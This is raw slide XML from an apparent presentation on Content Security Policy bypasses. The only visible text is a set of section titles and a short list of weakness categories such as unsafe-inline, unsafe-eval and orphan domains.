          <p:cNvPr id="19" name="Picture 18" descr="A dart in the center of a target&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E2EF356-5BEA-793F-7E7B-C66B57EEC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1142" y="1388127"/>
            <a:ext cx="969617" cy="969617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C406E0-5C70-CBD9-B564-9254296B7550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359843" y="2480753"/>
            <a:ext cx="1397177" cy="692497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Brief, I promise)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F9C06A-380A-C0C2-336D-33435DFC4FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771142" y="2535849"/>
            <a:ext cx="969618" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Aim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6DFBB5-7772-7838-23F3-70989664D5F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952124" y="5690719"/>
            <a:ext cx="1824567" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23" descr="A heart with a pulse line&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C656A76D-7536-5E8C-5BAA-F66FB9EE23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310" y="4562768"/>
            <a:ext cx="928775" cy="928775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73E4D351-0ACD-D276-2A98-5EE4BFECFC2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475774" y="5690719"/>
            <a:ext cx="1863822" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Health Status</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26" descr="A white paper with green corner&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84CEB89B-3C0C-092D-3341-ACF937DD3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7729" y="2194611"/>
            <a:ext cx="1013839" cy="1007763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{514CEEF5-5A96-A3CB-9546-A996BEC7433A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8629232" y="2386767"/>
            <a:ext cx="2029532" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29" descr="A cartoon character with a heart and a key&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C529B42-C499-B860-62FA-68D5C0DD2D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8218" y="4164515"/>
            <a:ext cx="1113950" cy="1107274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D977A3-BBFD-643D-1EBC-D17A5B920235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8697360" y="4434811"/>
            <a:ext cx="1835568" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Demos</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="40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32735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FEB1A1-1F5E-EAAC-60EB-8935AFAA2E2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0"/>
              <a:t>Third Party Abuse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0"/>
              <a:t>Orphan Domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0"/>
              <a:t>No CSP Defined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0"/>
              <a:t>Unsafe Eval</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0"/>
              <a:t>Unsafe Inline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0"/>
              <a:t>Others.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8A2841-D7B1-DCBE-A34A-5E816E729255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="189614"/>
            <a:ext cx="10534650" cy="817403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Weaknesses to Explore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF79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17694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10420-3785-7E91-0973-32951C0922F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="171297"/>
            <a:ext cx="12192000" cy="6515405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F981771-0838-4BC2-98AA-ED0F137CD7E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27708" y="443346"/>
            <a:ext cx="1487054" cy="34174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AF97DCFB-FFCA-D84B-0D5F-7EABE30E1C2B}"/>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6014" t="21996" r="79340" b="1211"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="733245" y="1604513"/>
            <a:ext cx="1785668" cy="5003321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195719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10420-3785-7E91-0973-32951C0922F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="9817" r="73892" b="48742"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3197524" y="970422"/>
            <a:ext cx="5796951" cy="4917156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF97DCFB-FFCA-D84B-0D5F-7EABE30E1C2B}"/>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6014" t="21996" r="79340" b="48743"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4559042" y="2458528"/>
            <a:ext cx="3211823" cy="3429050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258008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10420-3785-7E91-0973-32951C0922F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="47790" t="14079" r="130" b="47894"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="441635" y="1222640"/>
            <a:ext cx="11308730" cy="4412720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406259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5E6D79-F1DE-AD2E-DEAB-815F0096952D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12668720" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB59BD4-C012-E51A-535D-4811D30CDED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36947" y="221673"/>
            <a:ext cx="1487054" cy="34174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6DA73588-8D23-A221-6475-BF595A055C56}"/>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6606" t="20251" r="79163"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="836762" y="1388852"/>
            <a:ext cx="1802921" cy="5469147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339451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5E6D79-F1DE-AD2E-DEAB-815F0096952D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="71537" b="45660"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3319013" y="563419"/>
            <a:ext cx="5553974" cy="5739991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA73588-8D23-A221-6475-BF595A055C56}"/>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6606" t="20251" r="79163" b="45661"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4623758" y="2697072"/>
            <a:ext cx="2774462" cy="3597509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21746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5E6D79-F1DE-AD2E-DEAB-815F0096952D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="39085" b="46164"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304330" y="1136530"/>
            <a:ext cx="9583340" cy="4584940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1814336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E0EFC4-9E7D-0A83-0278-843E23D3F083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1842654" y="2444539"/>
            <a:ext cx="8506691" cy="1968921"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="12000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Now what?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4274343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F412123-1B51-6EC4-500E-DD3D7CCFF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087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D1C65B-EE5A-1AA2-0BFE-966702CB733D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="392814"/>
            <a:ext cx="10534650" cy="817403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B526528E-5DBA-FFD9-FEE4-FA04EA609738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1366039681"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="254474" y="1332907"/>
          <a:ext cx="11683048" cy="4678680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{72833802-FEF1-4C79-8D5D-14CF1EAF98D9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="340110">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3498660077"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3148366">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="406545722"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4073237">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2772294243"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2068248">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2187995182"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2053087">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="572257023"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>#</a:t>
